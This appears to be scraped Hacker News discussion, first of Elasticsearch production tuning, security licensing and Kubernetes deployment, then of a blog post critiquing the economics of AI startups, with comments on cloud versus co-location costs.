An ES stack is fairly easy to get up and running in a development environment with docker-compose. But, not so much with a secure production installation. After going down the path of trying to get production up and running with security, I found Open Distro for Elasticsearch [1] to be very helpful. https://opendistro.github.io/for-elasticsearch/

troelsSteegin(10000) 2 days ago [-]

I appreciate the systems perspective and find the writeup useful. However, from a production perspective, I think security should be topic one.

speedplane(4270) 1 day ago [-]

> from a production perspective, I think security should be topic one

Two general approaches to security:

- Upgrade to a paid Elastic cluster, and use their own feature-full security suite.

- Put a reverse proxy server in front of Elastic (like nginx), and configure that to handle security.

jugg1es(10000) 1 day ago [-]

Great to read from someone who knows it so deeply.

speedplane(4270) 1 day ago [-]

> Great to read from someone who knows it so deeply.

I'd say it's a decent read on Elasticsearch tuning at the intermediate level, but not enough to really get high performance from Elastic.

One of the problems with Elastic tuning is that the tuning parameters depend deeply on the type of data you're indexing. Indexing text is far different than indexing numbers or dates. A mapping with a large number of fields will behave differently than one with just a few. Some datasets can easily be split up into different indexes, and others cannot be.

To really get the most from Elasticsearch, you have to know what it's doing under-the-hood, and how that maps on to your data. Elasticsearch hides so much complexity (generally a good thing), but unfortunately, it can be difficult to know where the bottlenecks are.

DmitryOlshansky(10000) 2 days ago [-]

Mostly good stuff but a few comments:

- article doesn't clarify if it's on hardware or VMs

- 140 shards per node is certainly on the low side, one can easily scale to 500+ per node (if most shards are small, typically power law distribution)

- more RAM is better, and there is a ratio of disk:ram that you need to keep in mind (30-40 for hot data, 200-300 for warm data)

- heaps beyond 32g can be beneficial but you'd have to go for 64g+, 32-48g is a dead zone

- not a single line about GC tuning (I find default CMS to be quite horrible even in recommended ~31g sizes)

- CPUs are often a bottleneck when using SSD drives

paulddraper(4100) 1 day ago [-]

> 140 shards per node is certainly on the low side

That seems high, no?

Unless you were planning on scaling 20x, it seems you could easily have half the number.

detaro(2041) 2 days ago [-]

> - heaps beyond 32g can be beneficial but you'd have to go for 64g+, 32-48g is a dead zone

I'm curious why that is the case?

hilbertseries(10000) 2 days ago [-]

I'm kind of surprised this article doesn't mention anything about how many nodes you want in your cluster, since ES performance starts to degrade once you get past 40 or so nodes.

MuffinFlavored(4310) 2 days ago [-]

Serious question: does indexing Logstash/JSON logs really need to take gigabytes of memory + disk and sharding?

holoduke(10000) 2 days ago [-]

Is your list not entirely dependent on the use case? I have been using ES for years with over 1 million daily users. It provides simple search functionality. It runs on a single node with 4GB of memory, for more than 5 years with hardly any issues.

StreamBright(2786) 2 days ago [-]

Yep, I can confirm the GC part. We start with that before touching anything else to get the most out of the system. G1GC is pretty tunable.

DmitryOlshansky(10000) 2 days ago [-]

And another note on shards - indexing a shard is a single writer process.

If your drive tolerates parallel writes well (=SSD) having multiple primary shards per node helps scale indexing.

jillesvangurp(10000) 1 day ago [-]

The article isn't that good because it mostly just verbatim repeats (some of) the information in the official documentation but sadly mixes it with a lot of things that are simply not correct/misunderstood. Also it omits a lot of stuff that is actually important.

The hierarchy breakdown in the article is misleading. Lucene indexes fields, not documents. Understanding this is key. More fields == more files. Segments are per field not per ES index. A lucene index is not the same as an Elasticsearch index.

Segments are not immutable but an append only file structure. Lucene creates a new segment every time you create a new writer instance or when the lucene index is committed, which is something that happens every second in ES by default and something you could configure to something higher. So, new segment files are created frequently but not on a per document basis. ES/Lucene indeed constantly merge segment files as an optimization. Force merge is not something you should need to do often and certainly not while it is writing heavily. A good practice with log files is to do this after you roll over your indices. With modern setups, you should be reading up on index life cycle management (ILM) to manage this for you.

The notion that ES crashes at ~140 shards is complete bullshit that is based on a misunderstanding of the above. It depends on what's in those shards (i.e. how many fields). Each field has its own set of files for storing the reverse index, field data, etc. So, how many shards your cluster can handle depends on how your data is structured and how many of them you have. This also means you need lots of file handles.

Understanding how heap memory is used in ES is key and this article does not mention the notion of memory mapped files and even goes as far as to recommend the filesystem cache is not important!! This too is very misguided. The reality is that most index files are memory mapped files (i.e. not stored in the heap) and they only fit in memory if you have enough file cache memory available. Heap memory is used for other things (e.g. the query cache, write buffers, small data-structures with metadata about fields, etc.) and there are a lot of settings to control that which you might want to familiarize yourself with if you are experiencing throughput issues. Per index heap overhead is actually comparatively modest. I've had clusters with 1000+ shards with far less memory. This is not a problem if those shards are smallish.

The 32GB memory limit is indeed real if you use compressed pointers (which you need to configure on the JVM, ES does this by default). Far more important is that garbage collect performance tends to suffer with larger heaps because it has more stuff to do. The default heap settings with ES are not great for large heaps. ES recommends having at least (as a minimum) half your RAM available for caching. More is better. Having more disk than filecache means your files don't fit into ram. That can be OK for write heavy setups and might be OK for some querying (depending on which fields you actually query on). But generally having everything fit into memory results in more predictable performance.

GC tuning is a bit of a black art and unless you have mastered that, don't even think about messing with the GC settings in ES. It's one of those things where copy pasting some settings somebody else came up with can have all sorts of negative consequences. Most clusters that lose data do so because of GC pauses cause nodes to drop out of the cluster. Mis-configuring this makes that more likely.

CPU is important because ES uses CPU and threadpools for a lot of things and is very good at, e.g., writing to multiple segments concurrently. Most of these threadpools size themselves based on the number of available CPUs and can be controlled via settings that have sane defaults. Also, depending on how you set up your mappings (another thing this article does not talk about), your write performance can be CPU intensive. E.g. geospatial fields involve a bit of number crunching, and some more advanced text analysis can also suck up CPU.

karlney(10000) 2 days ago [-]

Hi, do you have real use experience running elasticsearch with 64g+ heap?

Are there any articles/benchmarks/notes or anything else that you would be willing to share?

We have considered trying out 64g+ heaps for our cluster but we are concerned about very long gc pauses impacting the search performance.

shreyshrey(4299) 2 days ago [-]

For the ES and Solr gurus here: what is the recommended max size for documents if you want to index a lot of office documents?

itronitron(4166) 2 days ago [-]

Whatever makes sense to your users for their search results. Do they want to get back the whole document or just the relevant parts?

If there are separate sections in the office documents that you can pull out and index as separate fields then you should do that. For example, if you were indexing patents, you would want to index abstracts and claims into separate fields.

speedplane(4270) 1 day ago [-]

> For ES and solr gurus here what is the recommended max size for documents if you want to index lot of office documents?

I run a large ES index covering 80TB of data, and regularly index documents as large as 20MB. At that size, the bottleneck is often transferring that much data over a network to the ES cluster. You need to make sure your HTTP client can handle it, and the network has enough bandwidth. Elasticsearch itself is not really the bottleneck.

mychael(4235) 2 days ago [-]

Is there a guide for deploying ES on K8S?

amtux(10000) 2 days ago [-]

For kubes you could use the helm chart they provide and tune it similarly. https://github.com/elastic/helm-charts/tree/master/elasticse...

manigandham(775) 1 day ago [-]

Elastic just released their operator called Elastic Cloud on Kubernetes (ECK): https://www.elastic.co/blog/elastic-cloud-on-kubernetes-ECK-...

Operators are basically mini-programs that run in your K8S cluster and automatically handle deployment, upgrades and maintenance for their specific software. This operator can setup all of the ELK stack and it's all done through custom resource definitions. Use this instead of the helm charts and manual YAML files.
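
For reference, with the operator installed, provisioning a cluster is a single custom resource; a minimal sketch patterned after the ECK quickstart (the version and sizing here are placeholders):

  apiVersion: elasticsearch.k8s.elastic.co/v1
  kind: Elasticsearch
  metadata:
    name: quickstart
  spec:
    version: 7.6.0
    nodeSets:
    - name: default
      count: 3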

speedgoose(10000) 2 days ago [-]

I was considering using ElasticSearch to replace my CouchDB indexes, which are way too slow, memory hungry, and not optimized. But I read somewhere (can't remember the source) that ElasticSearch doesn't offer any guarantee that all your data will (eventually) be saved or returned when queried. Is that the case?

frant-hartm(10000) 2 days ago [-]

Maybe you are thinking of Aphyr's analysis of elastic search where he showed that Elastic can lose indexed documents during network partitions:

https://aphyr.com/posts/323-call-me-maybe-elasticsearch-1-5-...

That analysis was done on a relatively old version. Elastic documents known (and fixed) issues here: https://www.elastic.co/guide/en/elasticsearch/resiliency/cur... but I wouldn't trust this to the letter, mainly because of their previous handling of such issues.

Elastic is great as a search index, not as a primary database.

CameronNemo(4096) 2 days ago [-]

They have done quite a bit of work to improve resiliency. You can learn more about the status of this work here:

https://www.elastic.co/guide/en/elasticsearch/resiliency/cur...

TL;DR it is still probably not ideal as a primary data store.

AznHisoka(3064) 2 days ago [-]

The default refresh rate for ES is a minute or so (can't remember the exact time). This means when you index a document, it won't be returned when you search for it until a minute later when the index refreshes.

But you can certainly change the configuration so it's practically real-time. There will be some performance hit though.
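
The knob in question is the per-index refresh_interval setting; for example (the index name and value are hypothetical):

  curl -X PUT 'http://localhost:9200/my-index/_settings' -H 'Content-Type: application/json' -d '
  {"index": {"refresh_interval": "1s"}}'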

harryf(4117) 2 days ago [-]

Struggling to read this ... the domain typo triggering OCD

StreamBright(2786) 2 days ago [-]

For a long time, I have read articles only in Pocket. The web has become unreadable at this stage. It is a bit funny that it was created to make the distribution of knowledge easier, with readability as its primary feature.

ivan_ah(2859) 2 days ago [-]

Does anyone have experience running Elasticsearch as a kubernetes deployment? Can you just spin up some big-RAM containers attached to persisted volumes?

Elastic Co. seems to have an offering specialized for k8s: https://www.elastic.co/elastic-cloud-kubernetes but I can't understand what it does exactly.

Our data is not crazy-big and it doesn't need to be super performant, but for operational simplicity I'd like to deploy as part of the production cluster like all our other app containers rather than some 'special' type of container.

zegl(4279) 2 days ago [-]

Yep, I'm running ES in a StatefulSet. It works nicely out of the box, using headless Services for node-to-node discovery and a custom preStop hook to make sure that the cluster doesn't become RED after a node shuts down.

kuhsaft(10000) 2 days ago [-]

I found Elastic Cloud on K8s to be the best way to deploy and manage Elastic clusters on Kubernetes so far.

https://www.elastic.co/guide/en/cloud-on-k8s/current/index.h...

kuhsaft(10000) 2 days ago [-]

Elastic Cloud on K8s is an operator that uses CRDs to define Elastic resources. The operator manages and deploys the appropriate deployments and statefulsets for the resource. It handles upgrades of the Elastic services as well. The operator pattern creates a more declarative way of provisioning Elastic resources.

_jsnk(10000) 2 days ago [-]

I was successful in using this guide: https://aws.amazon.com/blogs/opensource/open-distro-for-elas... to setup Amazon's Open Distro version of Elasticsearch/Kibana. I had to modify it to work with Elasticsearch 7.x (which corresponds to Open Distro 1.x). This guide was written for Elasticsearch 6.x (which corresponds to Open Distro 0.x).

StreamBright(2786) 2 days ago [-]

Great writeup. I wish there were a search engine built on top of Riak with a bit simpler workload distribution.

peterwwillis(2666) 2 days ago [-]

There's really nothing simple about building apps on top of Riak. It's one of those things that seems simple until you use it in production, and then you realize it's a total nightmare and you can't wait to sunset it.

statictype(3509) 2 days ago [-]

Is Riak still supported and used?

I was under the impression that it's dead.

Is that not the case?

ram_rar(10000) 2 days ago [-]

We used to use ElasticSearch a lot for log aggregation. It's a beast of its own; you still need a dedicated team to handle it. We eventually moved to Splunk- and Wavefront-like solutions. It costs a lot less and frees up engineering time to build a better product.

m1keil(10000) 1 day ago [-]

Related to this: can anyone share practical advice when it comes to running Elasticsearch for application and infrastructure log aggregation?

We started out using Elastic Cloud, which is nice enough and saves us the initial configuration time. However, I'm still unsure whether the choices I made are the right way to go when designing the indexes.

thickice(4248) 2 days ago [-]

Genuine question, as someone with no experience in dealing with large scale log aggregation: can you share some details on what kind of issues you ran into in production with Elastic Search that needed a dedicated team to manage?

andrewflnr(3680) 2 days ago [-]

This was a really helpful article for understanding the architecture of Elasticsearch. However, what I really want to know is why Elastic has the reputation of crapping itself for no reason and what can be done about it.

arwhatever(10000) 2 days ago [-]

It seems like most articles discussing Elasticsearch administration read like an instruction manual for something like a steam locomotive - describing just how to constantly shovel the coal in, relieve the steam pressure in just the right way, etc.

tyingq(4263) 2 days ago [-]

Does it still have the issue of failing 'open to the world' if the x-pack trial expires? See: https://discuss.elastic.co/t/ransom-attack-on-elasticsearch-...

bpicolo(10000) 2 days ago [-]

X-Pack's basic features are built into the latest Elasticsearch; the trial is for a separate set of features.

kuhsaft(10000) 2 days ago [-]

X-Pack Auth is now free and included with Elasticsearch.

karambir(4122) 2 days ago [-]

We were hit by this on Kibana 6.x as I didn't read the x-pack trial properly. I thought at least login would be there. My bad. We added Nginx auth after that.

But x-pack security is actually free from some point release in version 7. Though x-pack is not open source, just free to use. So our nginx Kibana auth is still there.

timv(4240) 1 day ago [-]

I'm the lead engineer for Elasticsearch security.

I'm sorry - I have never seen that specific post on our forums before, but the poster was mistaken and by not correcting it at the time, we have allowed incorrect information to perpetuate.

In versions where security was a paid feature, if a trial license expired, security would remain enabled, but certain operations would be rejected for all users (per the warning text 'Cluster health, cluster stats and indices stats operations are blocked')

We intentionally did not open the cluster to be world readable/writable. The administrator would be left with a cluster that was secure, but blocked access to some functions that are necessary for running a production cluster. It was up to them to explicitly upgrade to a paid license and re-enable those APIs, or downgrade to a 'basic' license which required acknowledgement that security would be disabled.

An example (this is from 6.7.0 because it's the newest version I have installed at the moment, where security was not free. This was true at the time the original forum post was written - I just tested 5.2.0 as well, and the results are the same, with slightly different error messages):

License state:

   license [fc5bee69-f086-4989-a32a-5db329692363] mode [trial] - valid
  license [fc5bee69-f086-4989-a32a-5db329692363] - expired
  recovered [1] indices into cluster_state
  LICENSE [EXPIRED] ON [SATURDAY, SEPTEMBER 28, 2019].
Curl without credentials:

  curl http://localhost:9200/
  {"error":{"root_cause":[{"type":"security_exception","reason":"missing authentication token for REST request [/]","header":{"WWW-Authenticate":["ApiKey","Basic realm=\"security\" charset=\"UTF-8\""]}}],"type":"security_exception","reason":"missing authentication token for REST request [/]","header":{"WWW-Authenticate":["ApiKey","Basic realm=\"security\" charset=\"UTF-8\""]}},"status":401}
Curl with credentials:

  curl -u elastic http://localhost:9200/
  Enter host password for user 'elastic':
  {
    "name" : "node1",
    "cluster_name" : "es-670",
    ...
Blocked cluster health:

  curl -u elastic http://localhost:9200/_cluster/health
  Enter host password for user 'elastic':
  {"error":{"root_cause":[{"type":"security_exception","reason":"current license is non-compliant for [security]","license.expired.feature":"security"}],"type":"security_exception","reason":"current license is non-compliant for [security]","license.expired.feature":"security"},"status":403}
Logs:

  blocking [indices:monitor/stats] operation due to expired license. ...
However, as mentioned by other sibling comments, security has been included in the free license since May last year, so as far as security is concerned, there is no longer a choice to make when a trial expires.

(Disclosure, as mentioned at the top, I work for Elastic)

six2seven(10000) 2 days ago [-]

As an alternative, there's the open-source OpenDistro for ElasticSearch [1], which offers X-Pack-like security along with some other X-Pack-like features. Although it is not officially supported by elastic.co, it's a pretty good alternative and is supported by Netflix, Amazon, et al. Worth giving it a try.

[1] https://opendistro.github.io/for-elasticsearch/

winrid(4161) 2 days ago [-]

I have found you need a queue in front of ES for better write reliability, more so than other DBs. The read/aggregation performance is fantastic though.

Also, you should know a little about GC tuning.

petemc_(10000) 2 days ago [-]

Can I ask how you implemented such a queue?




(652) Andreessen-Horowitz craps on "AI" startups from a great height

652 points about 21 hours ago by dostoevsky in 4306th position

scottlocklin.wordpress.com | Estimated reading time – 14 minutes | comments | anchor

Andreessen-Horowitz has always been the most levelheaded of the major current year VC firms. While other firms were levering up on "cleantech" and nonsensical biotech startups that violate physical law, they quietly continued to invest in sane companies (also hot garbage bugman products like soylent). I assume they actually listen to people on the front lines, rather than what their VC pals are telling them. Maybe they're just smarter than everyone else; definitely more independent minded. Their recent review on how "AI" differs from software company investments is absolutely brutal. I am pretty sure most people didn't get the point, so I'll quote it emphasizing the important bits.

https://a16z.com/2020/02/16/the-new-business-of-ai-and-how-its-different-from-traditional-software/

They use all the buzzwords (my personal bête noire: the term "AI" when they mean "machine learning"), but they've finally publicly noticed certain things which are abundantly obvious to anyone who works in the field. For example, gross margins are low for deep learning startups that use "cloud" compute. Mostly because they use cloud compute.

Gross Margins, Part 1: Cloud infrastructure is a substantial – and sometimes hidden – cost for AI companies

In the old days of on-premise software, delivering a product meant stamping out and shipping physical media – the cost of running the software, whether on servers or desktops, was borne by the buyer. Today, with the dominance of SaaS, that cost has been pushed back to the vendor. Most software companies pay big AWS or Azure bills every month – the more demanding the software, the higher the bill.

AI, it turns out, is pretty demanding:

  • Training a single AI model can cost hundreds of thousands of dollars (or more) in compute resources. While it's tempting to treat this as a one-time cost, retraining is increasingly recognized as an ongoing cost, since the data that feeds AI models tends to change over time (a phenomenon known as "data drift").
  • Model inference (the process of generating predictions in production) is also more computationally complex than operating traditional software. Executing a long series of matrix multiplications just requires more math than, for example, reading from a database.
  • AI applications are more likely than traditional software to operate on rich media like images, audio, or video. These types of data consume higher than usual storage resources, are expensive to process, and often suffer from region of interest issues – an application may need to process a large file to find a small, relevant snippet.
  • We've had AI companies tell us that cloud operations can be more complex and costly than traditional approaches, particularly because there aren't good tools to scale AI models globally. As a result, some AI companies have to routinely transfer trained models across cloud regions – racking up big ingress and egress costs – to improve reliability, latency, and compliance.

Taken together, these forces contribute to the 25% or more of revenue that AI companies often spend on cloud resources. In extreme cases, startups tackling particularly complex tasks have actually found manual data processing cheaper than executing a trained model.

This is something which is true of pretty much all machine learning with heavy compute and data problems. The pricing structure of "cloud" bullshit is designed to extract maximum blood from people with heavy data or compute requirements. Cloud companies would prefer to sell the time on a piece of hardware to 5 or 10 customers. If you're lucky enough to have a startup that runs on a few million rows worth of data and a GBM or Random Forest, it's probably not true at all, but precious few startups are so lucky. Those who use the latest DL woo on the huge data sets they require will have huge compute bills unless they buy their own hardware. For reasons that make no sense to me, most of them don't buy hardware.

In many problem domains, exponentially more processing and data are needed to get incrementally more accuracy. This means – as we've noted before – that model complexity is growing at an incredible rate, and it's unlikely processors will be able to keep up. Moore's Law is not enough. (For example, the compute resources required to train state-of-the-art AI models has grown over 300,000x since 2012, while the transistor count of NVIDIA GPUs has grown only ~4x!) Distributed computing is a compelling solution to this problem, but it primarily addresses speed – not cost.

Beyond what they're saying about the size of Deep Learning models which is doubtless true for interesting new results, admitting that the computational power of GPU chips hasn't exactly been growing apace is something rarely heard (though more often lately). Everyone thinks Moore's law will save us. NVIDIA actually does have obvious performance improvements that could be made, but the scale of things is such that the only way to grow significantly bigger models is by lining up more GPUs. Doing this in a "cloud" you're renting from a profit making company is financial suicide.

Gross Margins, Part 2: Many AI applications rely on "humans in the loop" to function at a high level of accuracy

Human-in-the-loop systems take two forms, both of which contribute to lower gross margins for many AI startups.

First: training most of today's state-of-the-art AI models involves the manual cleaning and labeling of large datasets. This process is laborious, expensive, and among the biggest barriers to more widespread adoption of AI. Plus, as we discussed above, training doesn't end once a model is deployed. To maintain accuracy, new training data needs to be continually captured, labeled, and fed back into the system. Although techniques like drift detection and active learning can reduce the burden, anecdotal data shows that many companies spend up to 10-15% of revenue on this process – usually not counting core engineering resources – and suggests ongoing development work exceeds typical bug fixes and feature additions.

Second: for many tasks, especially those requiring greater cognitive reasoning, humans are often plugged into AI systems in real time. Social media companies, for example, employ thousands of human reviewers to augment AI-based moderation systems. Many autonomous vehicle systems include remote human operators, and most AI-based medical devices interface with physicians as joint decision makers. More and more startups are adopting this approach as the capabilities of modern AI systems are becoming better understood. A number of AI companies that planned to sell pure software products are increasingly bringing a services capability in-house and booking the associated costs.

Everyone in the business knows about this. If you're working with interesting models, even assuming the presence of infinite accurately labeled training data, the "human in the loop" problem doesn't ever completely go away. A machine learning model is generally "man amplified." If you need someone (or, more likely, several someones) making a half million bucks a year to keep your neural net producing reasonable results, you might reconsider your choices. If the thing makes human level decisions a few hundred times a year, it might be easier and cheaper for humans to make those decisions manually, using a better user interface. Better user interfaces are sorely underappreciated. Have a look at Labview, Delphi or Palantir's offerings for examples of highly productive user interfaces.

Since the range of possible input values is so large, each new customer deployment is likely to generate data that has never been seen before. Even customers that appear similar – two auto manufacturers doing defect detection, for example – may require substantially different training data, due to something as simple as the placement of video cameras on their assembly lines.

Software which solves a business problem generally scales to new customers. You do some database back end grunt work, plug it in, and you're done. Sometimes you have to adjust processes to fit the accepted uses of the software; or spend absurd amounts of labor adjusting the software to work with your business processes: SAP is notorious for this. Such cycles are hugely time and labor consuming. Obviously they must be worth it at least some of the time. But while SAP is notorious (to the point of causing bankruptcy in otherwise healthy companies), most people haven't figured out that ML oriented processes almost never scale like a simpler application would. You will be confronted with the same problem as using SAP; there is a ton of work done up front; all of it custom. I'll go out on a limb and assert that most of the up front data pipelining and organizational changes which allow for it are probably more valuable than the actual machine learning piece.

In the AI world, technical differentiation is harder to achieve. New model architectures are being developed mostly in open, academic settings. Reference implementations (pre-trained models) are available from open-source libraries, and model parameters can be optimized automatically. Data is the core of an AI system, but it's often owned by customers, in the public domain, or over time becomes a commodity.

That's right; that's why a lone wolf like me, or a small team, can do as good or better a job than some firm with 100x the head count and 100m in VC backing. I know what the strengths and weaknesses of the latest woo are. Worse than that: I know that, from a business perspective, something dumb like Naive Bayes or a linear model might solve the customer's problem just as well as the latest gigawatt neural net atrocity. The VC backed startup might be betting on their "special tool" as its moaty IP. A few percent difference on a ROC curve won't matter if the data is hand wavey and not really labeled properly, which describes most data you'll encounter in the wild. ML is undeniably useful, but it is extremely rare that a startup has "special sauce" that works 10x or 100x better than something you could fork in a git repo. People won't pay a premium over in-house ad-hoc data science solutions unless it represents truly game changing results. The technology could impress the shit out of everyone else, but if it's only getting 5% better MAPE (or whatever), it's irrelevant. A lot of "AI" doesn't really work better than a histogram via "group by" query. Throwing complexity at it won't make it better: sometimes there's no data in your data.

Some good bullet points for would be "AI" technologists:

Eliminate model complexity as much as possible. We've seen a massive difference in COGS between startups that train a unique model per customer versus those that are able to share a single model (or set of models) among all customers....

Nice to be able to do, but super rare. If you've found a problem like this, you better hope you have a special, moaty solution, or a unique data set which makes it possible.

Choose problem domains carefully – and often narrowly – to reduce data complexity. Automating human labor is a fundamentally hard thing to do. Many companies are finding that the minimum viable task for AI models is narrower than they expected. Rather than offering general text suggestions, for instance, some teams have found success offering short suggestions in email or job postings. Companies working in the CRM space have found highly valuable niches for AI based just around updating records. There is a large class of problems, like these, that are hard for humans to perform but relatively easy for AI. They tend to involve high-scale, low-complexity tasks, such as moderation, data entry/coding, transcription, etc.

This is a huge admission of "AI" failure. All the sugar plum fairy bullshit about "AI replacing jobs" evaporates in the puff of pixie dust it always was. Really, they're talking about cheap overseas labor when lizard man fixers like Yang regurgitate the "AI coming for your jobs" meme; AI actually stands for "Alien (or) Immigrant" in this context. Yes they do hold out the possibility of ML being used in some limited domains; I agree, but the hockey stick required for VC backing, and the army of Ph.D.s required to make it work doesn't really mix well with those limited domains, which have a limited market.

Embrace services. There are huge opportunities to meet the market where it stands. That may mean offering a full-stack translation service rather than translation software or running a taxi service rather than selling self-driving cars.

In other words; you probably can't build a brain in a can that can solve all kinds of problems: you're probably going to be a consulting and services company. In case you aren't familiar with valuations math: services companies are worth something like 2x yearly revenue; where software and "technology" companies are worth 10-20x revenue. That's why the wework weasel kept trying to position his pyramid scheme as a software company. The implications here are huge: "AI" raises done by A16z and people who think like them are going to be at much lower valuations. If it weren't clear enough by now, they said it again:

To summarize: most AI systems today aren't quite software, in the traditional sense. And AI businesses, as a result, don't look exactly like software businesses. They involve ongoing human support and material variable costs. They often don't scale quite as easily as we'd like. And strong defensibility – critical to the "build once / sell many times" software model – doesn't seem to come for free.

These traits make AI feel, to an extent, like a services business. Put another way: you can replace the services firm, but you can't (completely) replace the services.

I'll say it again since they did: services companies are not valued like software businesses are. VCs love software businesses; work hard up front to solve a problem, print money forever. That's why they get the 10-20x revenues valuations. Services companies? Why would you invest in a services company? Their growth is inherently constrained by labor costs and weird addressable market issues.

This isn't exactly an announcement of a new "AI winter," but it's autumn and the winter is coming for startups who claim to be offering world beating "AI" solutions. The promise of "AI" has always been to replace human labor and increase human power over nature. People who actually think ML is "AI" think the machine will just teach itself somehow; no humans needed. Yet, that's not the financial or physical reality. The reality is, there are interesting models which can be applied to business problems by armies of well trained DBAs, data engineers, statisticians and technicians. These sorts of things are often best grown inside a large existing company to increase productivity. If the company is sclerotic, it can hire outside consultants, just as they've always done. A16z's portfolio reflects this. Putting aside their autonomous vehicle bets (which look like they don't have a large "AI" component to them), and some health tech bets that have at least linear regression tier data science, I can identify only two overtly data science related startups they've funded. They're vastly more long crypto currency and blockchain than "AI." Despite having said otherwise, their money says "AI" companies don't look so hot.

My TLDR summary:

  1. Deep learning costs a lot in compute, for marginal payoffs
  2. Machine learning startups generally have no moat or meaningful special sauce
  3. Machine learning startups are mostly services businesses, not software businesses
  4. Machine learning will be most productive inside large organizations that have data and process inefficiencies




All Comments: [-] | anchor

yogrish(2795) about 17 hours ago [-]

Nowadays DL models are becoming commodities very fast. By the time you train a NN to solve a particular problem, a new, more efficient model is out somewhere and is publicly available. So you need to go through the process all over again, or else you risk losing business. Unless your NN is so unique that you are handcrafting your own, in which case you take a lot of time to arrive at the best model and you need more PhDs.

jeremysalwen(10000) about 14 hours ago [-]

Props to the ML community for being so open.

bryanrasmussen(272) about 19 hours ago [-]

Generally the use of the phrase from a great height implies the height is one of morality, intellect, or valor (each of these decreasing in usage), I'm not exactly sure what the great height Andreessen-Horowitz craps from is composed of - maybe money?

I think they may just be crapping on them from a reasonable vantage point.

KaiserPro(10000) about 19 hours ago [-]

The height is not really about morals. It's more about the blast radius of the shit.

raiyu(3364) about 20 hours ago [-]

The number of places where machine learning can be used effectively, from both a cost perspective and a return perspective, is small. They are usually tremendously large datasets at gigantic companies, which probably have to build in-house expertise, because it's hard to package this up into a product and resell it for various industries, datasets, etc.

Certainly something like autonomous driving needs machine learning to function, but again, these are going to be owned by large corporations, and even when a startup is successful, it's really about the layered technology on top of machine learning that makes it interesting.

It's kind of like what Kelsey Hightower said about Kubernetes. It's interesting and great, but what will really matter is what service you put on top of it, so much so that whether you use Kubernetes becomes irrelevant.

So I think companies that are focusing on a specific problem, providing that value added service, building it through machine learning, can be successful. While just broadly deploying machine learning as a platform in and of itself can be very challenging.

And I think the autonomous driving space is a great example of that. They are building a value added service in a particular vertical, with tremendous investment, progress, and potentially life changing tech down the road. But as a consumer it's really the autonomous driving that is interesting, not whether they are using AI/machine learning to get there.

andreilys(10000) about 19 hours ago [-]

"The number of places where machine learning can be used effectively from both a cost perspective and a return perspective are small."

Thankfully, transfer learning and super convergence invalidate this claim.

Using pre-trained models + specific training techniques significantly reduces the amount of data you need, your training time and the cost to create near state of the art models.

Both Kaggle and Google Colab offer free GPUs.
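To make the parent's point concrete, here's a minimal transfer-learning sketch in PyTorch: load a pretrained backbone, freeze it, and train only a small replacement head. The model choice, class count, and hyperparameters are all illustrative, not a recommendation.

  import torch
  import torch.nn as nn
  from torchvision import models

  # ImageNet-pretrained backbone; we only pay to fine-tune a small head.
  model = models.resnet18(pretrained=True)

  # Freeze the pretrained weights so only the new head is trained.
  for param in model.parameters():
      param.requires_grad = False

  # Replace the final layer for a hypothetical 10-class task.
  model.fc = nn.Linear(model.fc.in_features, 10)

  optimizer = torch.optim.Adam(model.fc.parameters(), lr=1e-3)
  loss_fn = nn.CrossEntropyLoss()

  # One training step on a dummy batch, just to show the loop shape.
  x, y = torch.randn(8, 3, 224, 224), torch.randint(0, 10, (8,))
  optimizer.zero_grad()
  loss = loss_fn(model(x), y)
  loss.backward()
  optimizer.step()

With a frozen backbone, a modest labeled dataset and a single consumer GPU are often enough to get close to state of the art on a narrow task, which is also why this approach confers no moat on its own.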

Q6T46nT668w6i3m(3555) about 20 hours ago [-]

How would you explain the rise (and success) of machine learning in science? A lab that uses some learning-based method will likely be limited to just one or two people (responsible for data acquisition, feature engineering, evaluation, etc.) and extremely finite data.

jorblumesea(10000) about 15 hours ago [-]

It's interesting that the industry constantly has to relearn the idea that tech needs follow business needs, not the other way around. As you said, so many teams rushing to containerize, but if the services you run are piles of junk, do your users care about whether kubernetes can scale based on memory instead of cpu? Similarly, many effective 'recommendation engines' are just inverted indexes and not fancy ML models, and are a hell of a lot cheaper.

joshuaellinger(3999) about 18 hours ago [-]

I just spent $50K on coloc hardware. I'm taking a $10K/mo Azure spend down to a $1K/mo hosting cost.

But the real kicker is that I get 5x the cores, 20x the RAM, 10x the storage, and a couple of GPUs. I'm running last-generation InfiniBand (56Gb/sec) and modern U.2 SSDs (say 500MB/sec per device).

I figure it is going to take me about $10K in labor to move and then $1K/mo to maintain and pay for services that are bundled in the cloud. And because I have all this dedicated hardware, I don't have to mess around with docker/k8s/etc.

It's not really a big data problem but it shows the ROI on owning your own hardware. If you need 100 servers for one day per month, the cloud is amazing. But I do a bunch of resampling, simple models, and interactive BI type stuff, so co-loc wins easily.
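The payback math on those figures is worth spelling out (a sketch using only the numbers in the comment above; your rates will differ):

  cloud_monthly = 10_000     # current Azure spend, $/mo
  colo_monthly = 1_000       # hosting + bundled services after the move, $/mo
  hardware = 50_000          # up-front co-lo hardware
  migration_labor = 10_000   # one-time labor to move

  monthly_savings = cloud_monthly - colo_monthly          # $9,000/mo
  payback = (hardware + migration_labor) / monthly_savings
  print(f'payback in ~{payback:.1f} months')              # ~6.7 months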

Merrill(4248) about 5 hours ago [-]

This whole topic recapitulates all the arguments for business units acquiring and operating their own servers versus continuing to suffer the internal bill-backs from the corporate data center.

Some of the same caveats apply with respect to software updates, configuration control, security, availability, business continuity, disaster recovery, and what happens if the local admin is hit by a bus.

wpietri(3437) about 17 hours ago [-]

I'm sure you're right for your case. But I'd add one caveat for those less experienced: if you own the hardware, you need to be prepared to go to the colo when something breaks. The various clouds are a much nicer experience when hardware fails. At the very least, people should have enough spare capacity that a hardware failure means going sometime in the next couple of weeks, rather than getting up at 3 am and fixing things under pressure.

dboreham(3307) about 16 hours ago [-]

We never went cloud, except for ancillary things like build machines, Nagios, etc. that run on tiny VMs. Whenever I looked at the economics, I could buy a server of the class we needed for roughly 2x the monthly rent of the equivalent from Amazon.

sabalaba(2218) about 10 hours ago [-]

Yeah, we're seeing this all over the place at Lambda (https://lambdalabs.com). Most people running consistent GPU training or inference jobs are building on-prem clusters or even groups of workstations.

It just doesn't make financial sense to use the big cloud service providers for consistent workloads. I always hear stories where folks have saved hundreds of thousands in infrastructure costs by owning + co-lo.

bsenftner(4284) about 15 hours ago [-]

